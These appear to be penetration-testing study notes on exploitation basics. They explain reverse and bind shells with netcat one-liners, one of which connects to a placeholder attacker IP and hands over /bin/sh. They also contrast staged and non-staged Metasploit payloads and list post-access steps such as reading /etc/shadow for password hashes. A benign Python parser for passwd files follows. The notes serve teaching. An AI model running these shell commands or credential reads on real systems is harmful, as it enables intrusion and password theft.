Exploitation Basics
1. Shell
Reverse Shell : The target connects to the attacker.
Bind Shell : The attacker connects to the target.
1.1. Reverse Shell
Example (attacker listens, target connects back):
  Attacker: nc -nvlp 4444
  Target:   nc <attacker IP> 4444 -e /bin/sh
1.2. Bind Shell
Example (target listens, attacker connects):
  Target:   nc -nvlp 4444 -e /bin/sh
  Attacker: nc <target IP> 4444
2. Payloads
| Non-staged | Staged |
|---|---|
| Sends exploit shellcode all at once | Sends payload in stages |
| Larger in size and won't always work | Can be less stable |
| Example: windows/meterpreter_reverse_tcp | Example: windows/meterpreter/reverse_tcp |
3. Basic commands once we have access to the machine
- Try to find the IP(s) of the machine
- Check the arp table / route
- Check the sudo privileges
- Check the /etc/passwd file in order to see the different users of the machine (UIDs from 500)
- Check the /etc/shadow file in order to see the password hashes.
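As an added example (not part of the original notes), a small Python parser for the /etc/passwd format that lists the regular accounts (UID 500 and up, as the note says; many modern distros start at 1000), the ones whose shell actually allows a login, and, going one step beyond the notes as a defender's check, any account besides root that carries UID 0. The sample passwd content is constructed, not taken from a real host.

```python
from dataclasses import dataclass

# Constructed sample in /etc/passwd format; not captured from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bob:x:501:501:Bob:/home/bob:/bin/zsh
svc_backup:x:502:502:Backup service:/var/backup:/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
"""

# Shells that refuse an interactive login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

@dataclass
class PasswdEntry:
    name: str
    uid: int
    home: str
    shell: str

def parse_passwd(text):
    """Parse passwd(5) lines (name:passwd:uid:gid:gecos:home:shell); skip malformed ones."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if not line.strip() or line.startswith("#") or len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), home, shell))
    return entries

def user_accounts(entries, min_uid=500):
    """Regular users: UID at or above min_uid (the notes use 500; many modern distros start at 1000)."""
    return [e for e in entries if e.uid >= min_uid]

def interactive_users(entries, min_uid=500):
    """Regular users whose shell actually allows a login."""
    return [e for e in user_accounts(entries, min_uid) if e.shell not in NOLOGIN_SHELLS]

def extra_uid0_accounts(entries):
    """Defender check: any account besides root with UID 0 is a classic sign of a planted backdoor account."""
    return [e for e in entries if e.uid == 0 and e.name != "root"]

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print([e.name for e in interactive_users(entries)], [e.name for e in extra_uid0_accounts(entries)])
```

On a real system, feed it `open("/etc/passwd").read()` instead of the constructed sample.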